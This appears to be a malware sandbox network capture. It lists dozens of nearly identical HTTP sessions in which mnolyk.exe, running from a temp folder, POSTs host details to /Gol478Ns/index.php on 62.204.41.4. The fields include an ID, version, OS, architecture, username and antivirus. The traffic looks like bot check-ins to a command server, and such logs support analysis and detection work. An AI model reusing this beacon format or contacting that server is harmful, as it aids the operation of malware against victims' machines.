Feb 7, 2023 20:02:25.697906017 CET	476	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:25.760538101 CET	476	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
336	192.168.2.6	50059	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:26.009358883 CET	477	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:26.073587894 CET	477	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
337	192.168.2.6	50060	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:26.448813915 CET	478	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:26.515285015 CET	478	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
338	192.168.2.6	50061	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:27.765974045 CET	479	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:27.830638885 CET	479	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
339	192.168.2.6	50062	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:28.090657949 CET	480	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:28.155061007 CET	480	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.6	49752	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:59.119448900 CET	139	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:59.184709072 CET	139	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
340	192.168.2.6	50063	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:28.396717072 CET	481	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:28.460707903 CET	481	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
341	192.168.2.6	50064	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:30.633739948 CET	482	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:30.702920914 CET	482	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
342	192.168.2.6	50066	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:30.943301916 CET	490	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:31.006328106 CET	490	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
343	192.168.2.6	50067	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:31.198972940 CET	491	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:31.264014006 CET	491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
344	192.168.2.6	50068	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:31.452025890 CET	492	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:31.516680002 CET	492	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
345	192.168.2.6	50069	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:31.730232000 CET	493	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:31.794500113 CET	493	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
346	192.168.2.6	50070	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:31.982507944 CET	494	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:32.048238039 CET	494	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
347	192.168.2.6	50071	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:32.235512018 CET	495	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:32.298506021 CET	495	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
348	192.168.2.6	50072	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:32.475919008 CET	496	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:32.540923119 CET	496	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
349	192.168.2.6	50073	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:32.709343910 CET	497	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:32.774380922 CET	497	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.6	49753	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:59.355094910 CET	140	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:59.418791056 CET	140	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
350	192.168.2.6	50074	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:32.940709114 CET	497	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:33.003427982 CET	498	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
351	192.168.2.6	50075	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:33.175281048 CET	499	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:33.239239931 CET	499	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
352	192.168.2.6	50076	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:33.409322977 CET	500	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:33.471015930 CET	500	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
353	192.168.2.6	50077	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:33.659591913 CET	501	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:33.723758936 CET	501	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
354	192.168.2.6	50078	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:33.896003962 CET	502	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
